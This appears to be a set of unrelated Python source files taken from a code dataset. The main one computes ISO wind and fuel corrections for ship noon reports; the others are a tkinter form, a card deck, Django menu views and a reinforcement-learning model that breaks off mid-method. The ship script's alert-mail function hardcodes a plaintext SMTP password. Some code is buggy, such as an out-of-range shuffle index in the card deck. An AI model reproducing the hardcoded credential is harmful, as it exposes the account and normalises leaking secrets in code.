conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME,noondata.c.STW]).where(noondata.c.Vessel_Name=='PHU')).fetchall()\n # noon_parameter = conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME]).where(noondata.c.UID==83982)).fetchall()\n # noon_parameter = 
conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME]).where(and_(noondata.c.mail_date < datetime.date(2019,8,23),noondata.c.Vessel_Name=='PHU'))).fetchall()\n print(\"noondata:\",noon_parameter)\n # ves_mis=['PSL','PMA','PMU','PYN']\n ves_dtls_lst =[]\n validation_parameters = conn.execute(select([validation.c.Parameter,validation.c.Minimum_value,validation.c.Maximum_value])).fetchall()\n ves_dtls = conn.execute(select([vessel_details.c.id]).distinct())\n print(\"vessel_details:\",ves_dtls)\n for ves in ves_dtls:\n ves_dtls_lst.append(ves[0])\n print(\"ves_dtls_lst:\",ves_dtls_lst)\n \n for validation_param in validation_parameters:\n validation_dct[validation_param[0]+\"_min\"]=validation_param[1]\n validation_dct[validation_param[0]+\"_max\"]=validation_param[2]\n\n for obj_noon in noon_parameter:\n print(\"obj_noon:\",obj_noon)\n\n obj_noon_chk=list(obj_noon)\n obj_noon_chk=obj_noon_chk[:-1]\n print(\"rslt:obj\",obj_noon_chk)\n # if(obj_noon[0] not in ves_dtls_lst):\n # \tcontinue\n # if obj_noon[0] in ves_mis:\n # \tcontinue\n\n if obj_noon[0] not in ves_dtls_lst:\n print(\"vessel not in ves_dtls_lst\")\n continue\n\n try:\n for chk_noon in obj_noon_chk:\n print(\"check noon:\",chk_noon)\n # print(\"uidd:\",chk_noon[10])\n if chk_noon is None:\n print(\"check noon is none....\")\n raise Exception()\n except Exception as e:\n print(\"exception:\",e)\n continue\n\n lst_obj_noon = list(obj_noon)\n \n \n mcr=conn.execute(select([vessel_details.c.MCR ]).where(vessel_details.c.id==obj_noon[0])).fetchall()\n \n power_min=float(validation_dct[\"Power_min\"])*float(mcr[0][0])\n power_max=float(validation_dct[\"Power_max\"])*float(mcr[0][0])\n print(\"UID:\",obj_noon[10])\n print(\"vessel_name:\",obj_noon[0])\n\n if( ( (obj_noon[2]>=float(validation_dct[\"Draft_min\"]))&(obj_noon[2]<=float(validation_dct[\"Draft_max\"]))) &( (obj_noon[3]>=float(validation_dct[\"Draft_min\"]))&(obj_noon[3]<=float(validation_dct[\"Draft_max\"]))) &( (obj_noon[6]>=float(power_min))&(obj_noon[6]<=float(power_max))) &( (obj_noon[7]>=float(validation_dct[\"WindDirection_min\"]))&(obj_noon[7]<=float(validation_dct[\"WindDirection_max\"]))) &( (obj_noon[8]>=float(validation_dct[\"WindSpeed_kn_min\"]))&(obj_noon[8]<=float(validation_dct[\"WindSpeed_kn_max\"]))) &( (obj_noon[9]>=float(validation_dct[\"COURSE_AT_SEA_min\"]))&(obj_noon[9]<=float(validation_dct[\"COURSE_AT_SEA_max\"]))) &((obj_noon[16]>=float(validation_dct[\"M_E_FUEL_ONLY_STEAMING_TIME_min\"]))&(obj_noon[16]<=float(validation_dct[\"M_E_FUEL_ONLY_STEAMING_TIME_max\"]))) ) :\n #iso_parameter=metadata.tables['ISOPARAMETERnew']\n iso_vesls = conn.execute(select([iso_parameter.c.Vessel_id])).fetchall()\n \n #print(\"vessels in iso:\",iso_vesls)\n print(\"after validation\")\n if obj_noon[1] and obj_noon[4] and obj_noon[6]:\n for iso_ves in iso_vesls:\n if not obj_noon[0] in iso_ves[0]: \n continue\n dct_isoparams_db = {}\n lst_true_wind_speed = []\n iso_params = 
conn.execute(select([iso_parameter.c.design_draft,iso_parameter.c.breadth,iso_parameter.c.ref_area,iso_parameter.c.ALV,iso_parameter.c.HC,\tiso_parameter.c.CMC,iso_parameter.c.AOD,iso_parameter.c.HBR,iso_parameter.c.AXV,iso_parameter.c.LOA,iso_parameter.c.LBP,iso_parameter.c.B,\tiso_parameter.c.SC_draft,iso_parameter.c.anemoht,iso_parameter.c.z_ref,iso_parameter.c.a_b,iso_parameter.c.b_b,iso_parameter.c.a_sc,iso_parameter.c.\tb_sc,iso_parameter.c.disp_b,iso_parameter.c.disp_sc,iso_parameter.c.f1,iso_parameter.c.f2,iso_parameter.c.k,iso_parameter.c.disp_16,iso_parameter.c.Speedcoef]).where(iso_parameter.c.Vessel_id ==obj_noon[0] )).fetchall()\n draft_mean = (obj_noon[2] + obj_noon[3])/2\n iso_b = float(iso_params[0][11])\n iso_design_draft = float(iso_params[0][0])\n iso_breadth = float(iso_params[0][1])\n iso_ref_area = float(iso_params[0][2])\n iso_lbp = float(iso_params[0][10])\n iso_anemoht = float(iso_params[0][13])\n iso_z_ref = float(iso_params[0][14])\n iso_loa = float(iso_params[0][9])\n iso_aod = float(iso_params[0][6])\n iso_cmc = float(iso_params[0][5])\n iso_a_b = float(iso_params[0][15])\n iso_b_b = float(iso_params[0][16])\n iso_a_sc = float(iso_params[0][17])\n iso_b_sc = float(iso_params[0][18])\n iso_disp_b = float(iso_params[0][19])\n iso_disp_sc = float(iso_params[0][20])\n air_density = 1.25\n iso_noon_sog = obj_noon[1]\n iso_noon_power = float(obj_noon[6])\n iso_noon_displacement = obj_noon[4]\n iso_deltat = float(iso_params[0][12]) - draft_mean\n print(\"draft_mean:\",draft_mean)\n print(\"iso_deltat:\",iso_deltat)\n rad_to_deg = float(3.14/180)\n iso_area = float(iso_params[0][8]) + (iso_deltat*iso_b)\n print(\"iso_area:\",iso_area)\n iso_fuel_me_hs = float(obj_noon[11])\n\n try:\n iso_fuel_me_ls = float(obj_noon[12])\n except Exception as TypeError:\n iso_fuel_me_ls = 0\n \n iso_fuel_me_mdo = float(obj_noon[13])\n iso_fuel_me_mgo_hs = float(obj_noon[14])\n iso_fuel_me_mgo_ls = float(obj_noon[15])\n iso_f1 = float(iso_params[0][21])\n iso_f2 = float(iso_params[0][22])\n iso_k = float(iso_params[0][23])\n iso_disp_16 = float(iso_params[0][24])\n iso_speedcoef = float(iso_params[0][25])\n iso_me_fuel_only_steaming_time = float(obj_noon[16])\n if(obj_noon[17]!='NULL' and obj_noon[17]!=0 and obj_noon[17] is not None ):\n print(\"obj_noon[17]:\",obj_noon[17],type(obj_noon[17]))\n iso_noon_stw=float(obj_noon[17])\n else:\n iso_noon_stw=iso_noon_sog\n if(iso_me_fuel_only_steaming_time!=0 and iso_me_fuel_only_steaming_time < 30 ):\n dct_isoparams_db['FO_per_24Hrs'] = (iso_fuel_me_hs + iso_fuel_me_ls + iso_fuel_me_mdo + iso_fuel_me_mgo_hs + iso_fuel_me_mgo_ls)*24/iso_me_fuel_only_steaming_time\n dct_isoparams_db['SFOC'] = (dct_isoparams_db['FO_per_24Hrs']*10**6)/(24*iso_noon_power)\n \n \n # import pdb \n # pdb.set_trace()\n if iso_params:\n if iso_breadth and iso_breadth and iso_design_draft:\n draft_change = iso_design_draft - float(draft_mean)\n projarea_i = iso_breadth + iso_breadth + float(draft_change)\n \n if iso_params[0][8] and iso_b and iso_params[0][12] and iso_params[0][7] and iso_params[0][3] and iso_params[0][10] and iso_params[0][4]:\n iso_axv = iso_area\n print(\"iso_axv:\",iso_axv)\n iso_hbr = float(iso_params[0][7]) + iso_deltat\n iso_alv = float(iso_params[0][3]) + iso_lbp * iso_deltat\n iso_hci = (float(iso_params[0][3])*float(iso_params[0][4])+(0.5* iso_lbp * iso_deltat**2))/(float(iso_params[0][3])+(iso_lbp * iso_deltat)) \n\n if obj_noon[7] is None or obj_noon[1] is None or iso_params[0][12] is None or obj_noon[8] is None or obj_noon[9] is None or 
obj_noon[7] == '' :\n continue\n lst_true_wind_speed = true_wind_speed_calc(float(obj_noon[8]),float(obj_noon[1]),float(obj_noon[7]),float(obj_noon[9]),rad_to_deg)\n dct_isoparams_db[\"True_wind_speed\"] = lst_true_wind_speed[0]\n dct_isoparams_db[\"True_wind_dir\"] = lst_true_wind_speed[1]\n dct_isoparams_db[\"condn\"] = lst_true_wind_speed[2]\n dct_isoparams_db[\"numeratorcase\"] = lst_true_wind_speed[3]\n vwtref = true_wind_ref(lst_true_wind_speed[0],iso_anemoht,iso_z_ref,float(iso_params[0][12]),draft_mean,iso_axv,iso_b)\n lst_rel_wind_speed = relativewindspeed(vwtref,obj_noon[1],lst_true_wind_speed[1],obj_noon[9],rad_to_deg)\n dct_isoparams_db[\"ref_power\"] = (((1/iso_a_b) * iso_noon_stw)**(1/iso_b_b)) - ((((1/iso_a_b) * iso_noon_stw)**(1/iso_b_b)) - (((1/iso_a_sc) * iso_noon_stw)**(1/iso_b_sc))) * ((iso_noon_displacement-iso_disp_b) / (iso_disp_sc-iso_disp_b))\n dct_isoparams_db[\"ref_fuel\"] = (iso_f1*dct_isoparams_db[\"ref_power\"]**2)+(iso_f2*dct_isoparams_db[\"ref_power\"])+iso_k\n if(iso_me_fuel_only_steaming_time!=0 and iso_me_fuel_only_steaming_time < 30 ):\n dct_isoparams_db[\"fuel_loss\"] = (dct_isoparams_db['FO_per_24Hrs']-dct_isoparams_db[\"ref_fuel\"])*100/dct_isoparams_db[\"ref_fuel\"]\n \n rel_win_dir_corr = lst_rel_wind_speed[1]\n print(\"rel_win_dir_corr:\",rel_win_dir_corr)\n rel_win_speed_corr = lst_rel_wind_speed[0]\n print(\"rel_win_speed_corr:\",rel_win_speed_corr)\n dct_isoparams_db['Relative_wind_speed'] = rel_win_speed_corr\n dct_isoparams_db['Relative_wind_direction'] = rel_win_dir_corr\n \n \n ########....Fujiwara method for finding CAA.#####\n isoData_CLF_90_180 = -0.018 + 5.091 * (float(iso_b)/iso_loa) + (-10.367 * (iso_hci/iso_loa)) + (3.011 * (iso_aod/iso_loa**2)) + (0.341 * iso_axv/iso_b\t**2)\n isoData_CXLI_90_180 = 1.901 + (-12.727 * iso_alv)/(iso_loa *iso_hbr) + (-24.407 * iso_axv/iso_alv) + (40.310 * (iso_b/iso_loa)) + ((5.481 * iso_axv)/(\tiso_b*iso_hbr))\n isoData_CALF_90_180 = 0.314 + ((1.117 * iso_aod) / iso_alv)\n isoData_CLF_0_90 = 0.922 + ((-0.507 * iso_alv)/(iso_loa * iso_b)) + (-1.162 * iso_cmc/iso_loa)\n isoData_CXLI_0_90 = -0.458 + (-3.245 *((iso_alv)/(iso_loa * iso_hbr))) + (2.313 * (iso_axv)/(iso_b * iso_hbr))\n isoData_CALF_0_90 = 0.585 + (0.906 * (iso_aod/iso_alv)) + (-3.239 * iso_b/iso_loa)\n \n #if cond_n to be correct\n if rel_win_dir_corr >= 0 and rel_win_dir_corr < 90:\n isoData_wind_coeff = isoData_CLF_0_90 * math.cos(math.radians(rel_win_dir_corr)) + isoData_CXLI_0_90 *(math.sin(math.radians(rel_win_dir_corr)) - (0.5 * math.sin(math.radians(rel_win_dir_corr)) * (math.cos(math.radians(rel_win_dir_corr)))**2)) * math.sin(math.radians(rel_win_dir_corr)) *\t math.cos(math.radians(rel_win_dir_corr))+ isoData_CALF_0_90 * math.sin(math.radians(rel_win_dir_corr)) * (math.cos(math.radians(rel_win_dir_corr))**3)\n print(\"isoData_wind_coeff:\",isoData_wind_coeff)\n \n elif rel_win_dir_corr > 90 and rel_win_dir_corr <= 180:\t\t\t\t\n lst_rel_wind_speed = relativewindspeed(vwtref,obj_noon[1],lst_true_wind_speed[1],obj_noon[9],rad_to_deg)\n \n dct_isoparams_db[\"ref_power\"] = (((1/iso_a_b) * iso_noon_stw)**(1/iso_b_b)) - ((((1/iso_a_b) * iso_noon_stw)**(1/iso_b_b)) - (((1/iso_a_sc) * iso_noon_stw)**(1/iso_b_sc))) * ((iso_noon_displacement-iso_disp_b) / (iso_disp_sc-iso_disp_b))\n dct_isoparams_db[\"ref_fuel\"] = (iso_f1*dct_isoparams_db[\"ref_power\"]**2)+(iso_f2*dct_isoparams_db[\"ref_power\"])+iso_k\n if(iso_me_fuel_only_steaming_time!=0 and iso_me_fuel_only_steaming_time < 30 ):\n dct_isoparams_db[\"fuel_loss\"] = 
(dct_isoparams_db['FO_per_24Hrs']-dct_isoparams_db[\"ref_fuel\"])*100/dct_isoparams_db[\"ref_fuel\"]\n\n rel_win_dir_corr = lst_rel_wind_speed[1]\n rel_win_speed_corr = lst_rel_wind_speed[0]\n dct_isoparams_db['Relative_wind_speed'] = rel_win_speed_corr\n dct_isoparams_db['Relative_wind_direction'] = rel_win_dir_corr\n \n \n ########....Fujiwara method for finding CAA.#####\n isoData_wind_coeff = isoData_CLF_90_180 * math.cos(math.radians(rel_win_dir_corr)) + isoData_CXLI_90_180 * (math.sin(math.radians(rel_win_dir_corr\t)) - (0.5 * math.sin(math.radians(rel_win_dir_corr)) *(math.cos(math.radians(rel_win_dir_corr)))**2)) * math.sin(math.radians(rel_win_dir_corr)) * math.cos(math.radians(rel_win_dir_corr)) + isoData_CALF_90_180 * math.sin(math.radians(rel_win_dir_corr)) * (math.cos(math.radians(rel_win_dir_corr)))**3\n \n elif rel_win_dir_corr == 90:\n isoData_wind_coeff = (0.5 * (isoData_CLF_0_90 * math.cos(math.radians(80)) + isoData_CXLI_0_90 * (math.sin(math.radians(80)) - 0.5 * math.sin(math\t.radians(80)) * (math.cos(math.radians(80)))**2) * math.sin(math.radians(80)) * math.cos(math.radians(80)) + isoData_CALF_0_90 * math.sin(math\t.radians(80)) * (math.cos(math.radians(80)))**3 + isoData_CLF_90_180 * math.cos(math.radians(100)) + isoData_CXLI_90_180 * (math.sin(math.\tradians(100)) - 0.5 * math.sin(math.radians(100)) * (math.cos(math.radians(100)))**2) * math.sin(math.radians(100)) * math.cos(math.radians(100)) + isoData_CALF_90_180 * math.sin(math.radians(100)) * (math.cos(math.radians(100)))**3))\n \n \n isoData_wind_coeff_heading = (0.922 + (-0.507 * iso_alv)/( iso_loa * iso_b) + (-1.162 * iso_cmc/ iso_loa))*math.cos(math.radians(0))\n dct_isoparams_db['CAA'] = isoData_wind_coeff\n print(\"isoData_wind_coeff_heading:\",isoData_wind_coeff_heading)\n \n ##### Corrected Power and Reference Speed #####\n isoData_res_resistance = (.5 * air_density * iso_axv * rel_win_speed_corr**2 * isoData_wind_coeff) - (.5 * air_density * iso_axv * (iso_noon_sog*0.5144)**2 * isoData_wind_coeff_heading)\n print(\"isoData_res_resistance:\",isoData_res_resistance)\n dct_isoparams_db['RW'] = isoData_res_resistance\n isoData_corr_power = iso_noon_power - (isoData_res_resistance * iso_noon_stw*0.5144 /700)\n dct_isoparams_db['Corrected_Power'] = isoData_corr_power\n dct_isoparams_db[\"draft_pow\"] = isoData_corr_power+((((1/iso_a_sc) * iso_noon_stw)**(1/iso_b_sc)) - (((1/iso_a_b) * iso_noon_stw)**(1/iso_b_b)))/(iso_disp_sc-iso_disp_b)*(iso_disp_16-iso_noon_displacement)\n \n # print(\"csv columns:\",csv_columns)\n fo_nor_dct={} \n \n fo_nor_dct['REPORT_DATE_TIME']=obj_noon[18]\n fo_nor_dct['Vessel_Name']=obj_noon[0]\n fo_nor_dct['SOG']=iso_noon_sog\n dct_isoparams_db[\"draft_sp_pow\"] = dct_isoparams_db[\"draft_pow\"]*(12/iso_noon_stw)**iso_speedcoef\n fo_nor_dct['draft_sp_pow']=dct_isoparams_db[\"draft_sp_pow\"]\n\n dct_isoparams_db['fo_nor'] = (iso_f1*dct_isoparams_db[\"draft_sp_pow\"]**2)+(iso_f2*dct_isoparams_db[\"draft_sp_pow\"])+iso_k\n fo_nor_dct['fo_nor'] = dct_isoparams_db['fo_nor']\n fo_nor_lst=lst.append(fo_nor_dct.copy())\n print(\"fo_nor_dct:\",fo_nor_dct)\n print(\"fo_nor_lst:\",lst)\n\n \n dct_isoparams_db['fo_model'] = (iso_f1*iso_noon_power**2)+(iso_f2*iso_noon_power)+iso_k\n dct_isoparams_db[\"sfoc_model\"] = (dct_isoparams_db['fo_model']*10**6)/(24*iso_noon_power)\n if(iso_me_fuel_only_steaming_time!=0 and iso_me_fuel_only_steaming_time < 30 ):\n dct_isoparams_db['sfoc_deviation'] = (dct_isoparams_db['SFOC'] - dct_isoparams_db[\"sfoc_model\"])*100/dct_isoparams_db[\"sfoc_model\"]\n\n 
dct_isoparams_db[\"ref_power_corrected\"] = dct_isoparams_db[\"ref_power\"] - (isoData_res_resistance * iso_noon_stw*0.5144 /700)\n dct_isoparams_db[\"ref_FO_corrected\"] =(iso_f1*dct_isoparams_db[\"ref_power_corrected\"]**2)+(iso_f2*dct_isoparams_db[\"ref_power_corrected\"])+iso_k\n \n if(iso_me_fuel_only_steaming_time!=0 and iso_me_fuel_only_steaming_time < 30 ):\n dct_isoparams_db[\"Propulsive_eff\"] = (dct_isoparams_db[\"ref_FO_corrected\"]*100)/dct_isoparams_db['FO_per_24Hrs'] \n dct_isoparams_db[\"speed_performance\"] = (dct_isoparams_db[\"ref_power_corrected\"]*100)/iso_noon_power\n\n isoData_refcurv_speed = ((iso_a_b * isoData_corr_power**iso_b_b - ((iso_a_b * isoData_corr_power**iso_b_b) - (iso_a_sc * isoData_corr_power**iso_b_sc)) * ((\tiso_noon_displacement-iso_disp_b) / (iso_disp_sc-iso_disp_b))))\n print(\"isoData_corr_power:\",isoData_corr_power)\n if(isoData_corr_power > 0):\n isoData_refcurv_speed = ((iso_a_b * isoData_corr_power**iso_b_b - ((iso_a_b * isoData_corr_power**iso_b_b) - (iso_a_sc * isoData_corr_power**iso_b_sc)) * ((\tiso_noon_displacement-iso_disp_b) / (iso_disp_sc-iso_disp_b))))\n print(\"isoData_refcurv_speed:\",isoData_refcurv_speed)\n if isoData_refcurv_speed == 0:\n continue\n dct_isoparams_db['Ref_speed'] = isoData_refcurv_speed\n isoData_perf_value = (iso_noon_stw-isoData_refcurv_speed) * 100/isoData_refcurv_speed\n print(\"P_I:\",isoData_perf_value)\n dct_isoparams_db['P_I'] = isoData_perf_value\n update_noon_iso = update(noondata).where(noondata.c.UID == obj_noon[10])\n update_noon_iso = update_noon_iso.values(dct_isoparams_db)\n # conn.execute(update_noon_iso)\n \n\n csv_columns = fo_nor_dct.keys()\n print(\"csv_columns:\",csv_columns)\n try:\n with open('/home/lekha/Documents/mtm_windspeed/ISO/test.csv', 'w') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\n writer.writeheader()\n for data in lst:\n writer.writerow(data)\n except IOError:\n print(\"I/O error\")\ndef true_wind_speed_calc(wind_speed,speed,wind_dir,cog,rad_to_deg):\n # import pdb \n # pdb.set_trace()\n lst_return = []\n wind_speed = wind_speed*0.5144\n speed = speed*0.5144\n vwt = math.sqrt(wind_speed*wind_speed + speed*speed - (2 * wind_speed * speed * math.cos(math.radians(wind_dir))))\n lst_return.append(vwt)\n x = wind_speed* math.cos(math.radians(wind_dir+cog))\n y = speed*math.cos(math.radians(cog))\n cond_n = (wind_speed* math.cos(math.radians(wind_dir+cog))) -(speed*math.cos(math.radians(cog)))\n cond_n = round(cond_n,4)\n numeratorcase = float((wind_speed*math.sin(math.radians(wind_dir+cog)))-(speed*math.sin(math.radians(cog))))\n wind_dir = math.degrees(math.atan2(numeratorcase,cond_n))\n truewinddir = abs(math.degrees(math.atan2(numeratorcase,cond_n)))\n \n #zero_flg = abs(numeratorcase/cond_n)\n #print(\"zero_flg1\",zero_flg)\n \"\"\"if cond_n >= 0:\n truewinddir = math.degrees(math.atan2(numeratorcase,cond_n))\n else:\n truewinddir = (math.degrees(math.atan2(numeratorcase,cond_n)))+180\"\"\"\n lst_return.append(truewinddir)\n lst_return.append(cond_n)\n lst_return.append(numeratorcase)\n return(lst_return)\n\n\ndef alert_mail(str_error):\n\n \n msg = MIMEMultipart()\n # storing the senders email address\n fromaddr = config('frmaddrs')\n msg['From'] = fromaddr\n # storing the receivers email address script-status-alerts@xship.in\n toaddrs = config('toaddrs')\n msg['To'] = toaddrs\n # storing the subject\n msg['Subject'] = \"MTM NOONDATA iso script status alert\"\n body = \"\"\n body = \"MTM NOONDATA ISO calculation not completed due to the error 
:-\\n\\n\"+str(str_error)\n \n\n msg.attach(MIMEText(body, 'plain'))\n # creates SMTP session\n s = smtplib.SMTP('outlook.office365.com', 587)\n # start TLS for security\n s.starttls()\n # Authentication\n s.login(fromaddr, \"navgathi@12*\")\n # Converts the Multipart msg into a string\n text = msg.as_string()\n\n s.sendmail(fromaddr,[toaddrs], text)\n s.quit()\n\n\ndef true_wind_ref(twind,za,zref,tref,t,Aref,B):\n\n # import pdb \n # pdb.set_trace()\n deltat = tref-t\n zaref=za-t\n Area=Aref+deltat*B\n a = Aref*(zref+deltat)\n b = 0.5*B*deltat**2\n zref=(Aref*(zref+deltat)+0.5*B*deltat**2)/Area\n z_za = (zref/zaref)\n vwtref = twind*(float(z_za)**float(1/7))\n return vwtref\n\ndef relativewindspeed(vwtref,speed,truewinddir,cog,rad_to_deg):\n # import pdb \n # pdb.set_trace()\n lst_result = []\n windspeed=vwtref#*0.5144\n speed=speed*0.5144\n vwrref = math.sqrt(windspeed**2 + speed**2 + (2 * windspeed * speed * math.cos(math.radians (truewinddir-cog))))\n lst_result.append(vwrref)\n cond_n = (windspeed*math.cos(math.radians(truewinddir-cog)))+speed\n numeratorcase = windspeed*math.sin(math.radians(truewinddir-cog))\n relwinddir = abs(math.degrees(math.atan2(numeratorcase,cond_n)))\n \"\"\"if cond_n>=0:\n relwinddir = math.degrees(math.atan2(cond_n,numeratorcase))\n else:\n relwinddir = (math.degrees(math.atan2(cond_n,numeratorcase)))+180\"\"\"\n\n lst_result.append(relwinddir)\n return lst_result\n\nif __name__ == \"__main__\":\n # iso_data_fetch_calc()\n try:\n iso_data_fetch_calc()\n except Exception as e:\n alert_mail(e)\n raise\n \n\n\n","sub_path":"ISO/iso_calculation_fo_nor.py","file_name":"iso_calculation_fo_nor.py","file_ext":"py","file_size_in_byte":32584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"292651393","text":"from tkinter import *\r\nfrom tkinter.ttk import Combobox\r\nwindow = Tk()\r\nwindow.title(\"Hello Python\")\r\nwindow.geometry(\"400x300+10+10\")\r\nwindow.config(bg=\"Green\")\r\nvar = StringVar()\r\nvar.set(\"one\")\r\ndata=(\"one\",\"two\",\"three\",\"four\")\r\ncb=Combobox(window,values=data)\r\ncb.place(x=60,y=150)\r\nlb=Listbox(window,height=5,selectmode='multiple')\r\nfor num in data:\r\n lb.insert(END,num)\r\nlb.place(x=250,y=150)\r\nv0=IntVar()\r\nv0.set(1)\r\nr1=Radiobutton(window,text=\"male\",variable=v0,value=1)\r\nr2=Radiobutton(window,text=\"female\",variable=v0,value=2)\r\nr1.place(x=100,y=100)\r\nr2.place(x=180,y=100)\r\nv1=IntVar()\r\nv2=IntVar()\r\nC1 = Checkbutton(window,text=\"cricket\",variable=v1)\r\nC2 = Checkbutton(window,text=\"Hockey\",variable=v2)\r\nbtn=Button(window,text=\"Submit\",fg=\"Blue\",font=34)\r\nbtn.place(x=90,y=200)\r\nlbl=Label(window,text=\"Here We Can Show Label\",fg=\"Red\",font=45)\r\nlbl.place(x=30,y=40)\r\nwindow.mainloop()","sub_path":"Selection.py","file_name":"Selection.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"289294192","text":"from card import Card\nfrom collections import deque\nimport random\n\nclass DeckOfCards( Card ):\n # the plan here is to make a new card object and add it to the deck\n deck = deque( maxlen=52 )\n removed = deque()\n\n def __init__( self, shuffle=False ): \n for i in Card.suits:\n for j in range( 1,14 ):\n self.deck.append( Card( i, j ))\n if shuffle:\n self.deck.shuffle()\n def __repr__( self ):\n pass\n \n def __str__( self ):\n s = \"\" # string to be built which will be returned\n \n for i in self.deck:\n s += str( i ) + 
\"\\n\"\n return s\n\n def shuffle( self ):\n for i in range( len( self.deck )):\n r = random.randint( 0, 52 )\n self.deck[i], self.deck[r] = self.deck[r], self.deck[i]\n\n\n def draw( self ):\n if( len( self.deck ) > 0 ):\n print( self.deck.pop() ) \n # if we have a player class we shouldn't print this, but leave it to the player to print this out\n else:\n print( \"Out of cards!\" )\n\n","sub_path":"deckofcards.py","file_name":"deckofcards.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"128015328","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n#update:2014-11-12 by 250305240@qq.com\n\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.shortcuts import render_to_response,RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom webapp.common.CommonPaginator import SelfPaginator\nfrom webapp.view.admin.permission import PermissionVerify\nfrom webapp.view.admin.menu_forms import MenuListForm\nfrom webapp.models import Menu\n\n@login_required\n@PermissionVerify()\ndef AddMenu(request):\n if request.method == \"POST\":\n form = MenuListForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('listmenuurl'))\n else:\n form = MenuListForm()\n\n kwvars = {\n 'form':form,\n 'request':request,\n }\n\n return render_to_response('UserManage/menu.add.html',kwvars,RequestContext(request))\n\n@login_required\n@PermissionVerify()\ndef ListMenu(request):\n mList = Menu.objects.all()\n\n #分页功能\n lst = SelfPaginator(request,mList, 20)\n\n kwvars = {\n 'lPage':lst,\n 'request':request,\n }\n\n return render_to_response('UserManage/menu.list.html',kwvars,RequestContext(request))\n\n@login_required\n@PermissionVerify()\ndef EditMenu(request,ID):\n iMenu = Menu.objects.get(id=ID)\n\n if request.method == \"POST\":\n form = MenuListForm(request.POST,instance=iMenu)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('listmenuurl'))\n else:\n form = MenuListForm(instance=iMenu)\n\n kwvars = {\n 'ID':ID,\n 'form':form,\n 'request':request,\n }\n\n return render_to_response('UserManage/menu.edit.html',kwvars,RequestContext(request))\n\n@login_required\n@PermissionVerify()\ndef DeleteMenu(request,ID):\n Menu.objects.filter(id = ID).delete()\n\n return HttpResponseRedirect(reverse('listmenuurl'))\n","sub_path":"webapp/view/admin/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"583032385","text":"from subprocess import Popen\n\nerr = open('error.txt', 'w+')\np = Popen(['javac', 'Main.java'], stderr=err)\np.wait()\nerr.close()\n\nif p.returncode != 0:\n with open('error.txt', \"r\") as f:\n t = f.readline()\n s = \"should be declared in a file named\"\n pos = t.find(s)\n if pos == -1:\n print(\"Compilation Error\") # this happens if we did not found message \"should be\n # declared in a file named\" in first line of error message\n else:\n new_name = t[pos + len(s) + 1:].strip()\n print(\"File should be named:\", new_name)\n","sub_path":"java/GetJavaPublicClassName.py","file_name":"GetJavaPublicClassName.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"204995367","text":"from math import exp\nimport numpy\nimport json\nfrom itertools import 
product\nfrom scipy.stats.distributions import beta\n\nclass Two_Stage_Model(object):\n def __init__(self,alpha1,alpha2,lam,B1,B2,W,p):\n self.alpha1 = alpha1\n self.alpha2 = alpha2\n self.lam = lam\n self.B1= B1\n self.B2 = B2\n self.W = W\n self.p = p\n # stage action possibilities\n self.stage_action_list = {0: (0,1), 1: (2,3), 2: (4,5)}\n # transition counts\n self.transition_counts = {(0,1):0, (0,2):0, (1,1):0, (1,2):0}\n # initialize Q values\n self.Q_TD_values = numpy.ones((3,6))*0\n self.Q_MB_values = numpy.ones((3,6))*0\n self.sum_neg_ll = None\n\n def updateQTD(self,r,s1,a1,s2=None,a2=None,alpha=.05):\n if s2 == None:\n delta = r - self.Q_TD_values[s1,a1]\n else:\n delta = r + self.Q_TD_values[s2,a2] - self.Q_TD_values[s1,a1]\n self.Q_TD_values[s1,a1] += alpha*delta\n return delta\n \n def updateQMB(self,T):\n self.Q_MB_values[1:3,:] = self.Q_TD_values[1:3,:]\n for a in self.stage_action_list[0]:\n self.Q_MB_values[0,a] = T[(a,1)] * numpy.max(self.Q_TD_values[1,2:4]) + \\\n T[(a,2)] * numpy.max(self.Q_TD_values[2,4:6])\n \n def 